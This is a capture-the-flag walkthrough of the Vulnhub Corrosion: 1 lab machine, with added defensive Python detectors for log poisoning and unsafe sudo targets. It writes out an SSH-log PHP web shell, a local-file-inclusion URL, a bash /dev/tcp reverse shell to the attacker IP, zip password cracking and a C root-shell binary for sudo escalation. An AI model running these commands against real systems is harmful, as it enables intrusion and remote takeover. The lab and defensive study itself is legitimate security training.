Vulnhub target machine Corrosion: 1 penetration test detailed explanation
Vulnhub target machine introduction:
Vulnhub is a comprehensive practice range offering a variety of vulnerable platforms. Its virtual machines can be downloaded and opened in a local VM, and completing them is like playing a game: penetration testing, privilege escalation, vulnerability exploitation, code auditing and other interesting exercises.
This is a vulnerable target machine; as usual, the goal is simply to find the flag.
Difficulty: Easy
Vulnhub target machine download:
Official website download: https://download.vulnhub.com/corrosion/Corrosion.ova
Vulnhub target machine installation:
After downloading, unzip the package and open it with VMware.
Detailed Explanation of Vulnhub Target Machine Vulnerabilities:
①: Information collection:
On Kali, use arp-scan -l or netdiscover to discover hosts, then scan the target with:
nmap -sS -sV -T4 -n -p- 192.168.0.103
Attacking machine: Kali, IP 192.168.0.104. Target machine IP: 192.168.0.103.
Ports 80 and 22 are found open. Port 80 serves the Apache default page, so scan it in the usual way with dirb, dirsearch, whatweb, gobuster etc.:
gobuster dir -u http://192.168.0.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip
whatweb 192.168.0.103
dirsearch -u http://192.168.0.103 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Here the scan turns up a /tasks directory; accessing it shows a to-do note:
- Changing permissions for authorization logs
- change port 22 -> 7672
- set up phpMyAdmin
A dirsearch or gobuster scan then also finds /blog-post, which we access next.
②: Vulnerability discovery:
No usable information is found yet, so keep collecting: scan the second-level directory under /blog-post with gobuster, which finds /archives:
gobuster dir -u http://192.168.0.103/blog-post/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip
Under /archives there is a randylogs.php that returns a completely blank page. A blank page like this smells like a file-inclusion script whose include target is missing from the request, so fuzz the parameter name with ffuf. This finds the parameter file, which can then be used for file inclusion:
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u 'http://192.168.0.103/blog-post/archives/randylogs.php?FUZZ=/var/log/auth.log' -fs 0
③: Exploiting the file inclusion (writing a web shell into the ssh log):
ssh '<?php system($_REQUEST['cmd']);?>'@192.168.0.103
view-source:http://192.168.0.103/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig # viewing the source shows the command executed successfully!
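The defender's side of the same technique is a log-poisoning check: the ssh command above leaves the PHP tag in auth.log as an sshd "Invalid user" entry, which is easy to spot because it looks nothing like a user name. The following detector is an added example, not part of the original walkthrough, and the auth.log lines it runs over are constructed to mirror what that command leaves behind.

```python
import re

# Constructed sample auth.log excerpt (not captured from the target machine);
# the first two entries show the user name the walkthrough's ssh command leaves.
SAMPLE_AUTH_LOG = """\
Feb  1 10:00:00 corrosion sshd[1234]: Invalid user <?php system($_REQUEST['cmd']);?> from 192.168.0.104 port 50000
Feb  1 10:00:00 corrosion sshd[1234]: Failed password for invalid user <?php system($_REQUEST['cmd']);?> from 192.168.0.104 port 50000 ssh2
Feb  1 10:00:05 corrosion sshd[1240]: Invalid user admin from 192.168.0.104 port 50004
Feb  1 10:01:12 corrosion sshd[1251]: Accepted password for randy from 192.168.0.104 port 50010 ssh2
"""

# sshd lines that carry a client-supplied user name.
SSHD_EVENT = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|(?:Failed|Accepted) \w+ for(?: invalid user)?) "
    r"(?P<user>.*?) from (?P<src>\S+) port (?P<port>\d+)"
)
# What a legitimate Unix user name looks like (roughly useradd's default rule).
VALID_USERNAME = re.compile(r"^[a-z_][a-z0-9_.-]{0,31}$")
# Fragments of code that only make sense if the log is later include()d.
CODE_MARKERS = re.compile(
    r"<\?|\?>|\$_(?:GET|POST|REQUEST|COOKIE)|system\(|passthru\(|shell_exec\(|exec\("
)


def classify_user(user):
    """Return the reasons a logged user name looks like log poisoning."""
    reasons = []
    if CODE_MARKERS.search(user):
        reasons.append("contains PHP code markers")
    if not VALID_USERNAME.match(user):
        reasons.append("not a valid user name")
    return reasons


def find_poisoned_entries(lines):
    """Scan auth.log lines; return (line_no, source_ip, user, reasons) per hit."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        m = SSHD_EVENT.search(line)
        if not m:
            continue
        reasons = classify_user(m.group("user"))
        if reasons:
            hits.append((line_no, m.group("src"), m.group("user"), reasons))
    return hits


if __name__ == "__main__":
    for line_no, src, user, reasons in find_poisoned_entries(SAMPLE_AUTH_LOG.splitlines()):
        print(f"line {line_no}: from {src}: {user!r}: {', '.join(reasons)}")
```

The "not a valid user name" rule is the broader of the two and catches payloads in languages other than PHP; the code-marker rule gives a higher-confidence signal for the case shown on this page. The to-do note's "Changing permissions for authorization logs" is the other half of the fix: auth.log should not be readable by the web server user at all.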
④: Reverse shell:
nc -lvvp 4444
echo "bash -i >& /dev/tcp/192.168.0.104/4444 0>&1" | bash # this needs to be URL-encoded
http://192.168.0.103/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=echo%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.0.104/4444%200%3E%261%22%20%7C%20bash # the URL-encoded form
⑤: Privilege escalation via a gcc-compiled binary:
After getting the shell, first check our privileges: we are the low-privileged www-data user, so we need to escalate.
sudo -l
Check whether there are any sudo-executable files or hidden files, and look at randylogs.php.
In the /var directory a backups folder is found, which may hold a backup file.
To pull files off the target machine, start a temporary web service with python: python3 -m http.server 8000
Download user_backup.zip and find that it requires a password.
Use zip2john user_backup.zip > passwd.txt to extract the hash into the passwd.txt file, then crack it with john using a dictionary.
If you run john without a dictionary and abort it, rerunning reports an error because a /root/.john/john.rec session file is left behind; if that happens, just delete it with rm -rf /root/.john/john.rec.
Crack with the rockyou dictionary; fcrackzip can also be used. The password obtained is: !randybaby
Now we know an account, randy, and its password; try logging in as randy, and the login succeeds!!!
Collect basic information: id, whoami, sudo -l
sudo -l shows that /tools/easysysinfo can be executed as root without a password. Running it shows that it calls cat, and a .c source file sits next to it. Use which to check whether gcc is available; if it is, write a new easysysinfo.c with the content in the code block below, compile it with gcc, and run the compiled file with sudo.
#include <unistd.h>
#include <stdlib.h>

/* Replacement easysysinfo.c: once compiled over the sudo-allowed binary,
   it runs as root and drops into an interactive root shell. */
int main(void)
{
    setuid(0);           /* become root (sudo already runs us with uid 0) */
    setgid(0);
    system("bash -i");   /* the interactive shell inherits the root uid/gid */
    return 0;
}
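The escalation works because the sudo rule points at a binary the randy user can rebuild and replace. As an added example (not code from the walkthrough or from the target machine), the following audit flags exactly that condition for any command path from sudoers: the target, and the directory holding it, should be owned by root and not writable by group or others. The paths in the usage call are assumptions; on a real system you would pass the entries shown by sudo -l.

```python
import stat
from pathlib import Path


def mode_findings(owner_uid, mode, what="target"):
    """Reasons a file with this owner uid and st_mode is unsafe as a sudo target.

    Pure function so it can be exercised without root-owned fixtures.
    """
    findings = []
    if owner_uid != 0:
        findings.append(f"{what} not owned by root (uid {owner_uid})")
    if mode & stat.S_IWGRP:
        findings.append(f"{what} is group-writable")
    if mode & stat.S_IWOTH:
        findings.append(f"{what} is world-writable")
    return findings


def audit_sudo_target(path):
    """Check one command path from a sudoers rule (e.g. /tools/easysysinfo)."""
    p = Path(path)
    try:
        st = p.stat()
    except FileNotFoundError:
        return [f"{path} does not exist"]
    findings = []
    if not p.is_absolute():
        findings.append(f"{path} is not an absolute path")
    findings += mode_findings(st.st_uid, st.st_mode, path)
    # The directory matters too: a user who can write the directory can
    # rename the binary away and drop a replacement in its place.
    # (The sticky bit is not special-cased here.)
    parent = p.parent.stat()
    findings += mode_findings(parent.st_uid, parent.st_mode, f"directory {p.parent}")
    return findings


def audit_many(paths):
    """Audit several sudoers command paths; an empty list means no finding."""
    return {path: audit_sudo_target(path) for path in paths}


if __name__ == "__main__":
    # Hypothetical paths for illustration.
    for path, findings in audit_many(["/tools/easysysinfo", "/usr/bin/cat"]).items():
        print(path, "->", findings or ["ok"])
```

Run as the user named in the sudo rule, a non-empty finding list for a NOPASSWD entry is the same condition this section exploits, only viewed from the other side. The unqualified cat call the binary makes is a separate weakness (PATH lookup under sudo), which is why sudo's secure_path setting exists.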
⑥: Get the FLAG:
At this point the flag has been obtained and the penetration test in this article is complete. Thank you for reading!!
Vulnhub target machine penetration summary:
The difficulty of this target machine is a bit above medium, because it is fairly involved:
1. Information collection: arp-scan -l to obtain the IP address and port information; web scanning tools: nikto, dirb, dirbuster, whatweb, ffuf etc.; and F12 to view the page source.
2. File inclusion vulnerability: include the ssh log file and write a web shell into it with ssh '<?php system($_REQUEST['cmd']);?>'@target-machine (new knowledge point!)
3. nc reverse shell (URL encoding is needed here); zip2john and fcrackzip (tools for cracking password-protected archives) and the fix for the john error (new knowledge points!)
4. python3 -m http.server 8000 to start a temporary http service
5. Privilege escalation with a gcc-compiled file; which to check whether useful commands for privilege escalation exist on the system
This is the first target machine in the Corrosion series; I learned a lot of knowledge points and it was a very rewarding day (Yay!). Creating this was not easy; I hope it helps everyone, and if you like it please give it a one-click triple (like, coin, favorite)! Happiness is my greatest happiness!!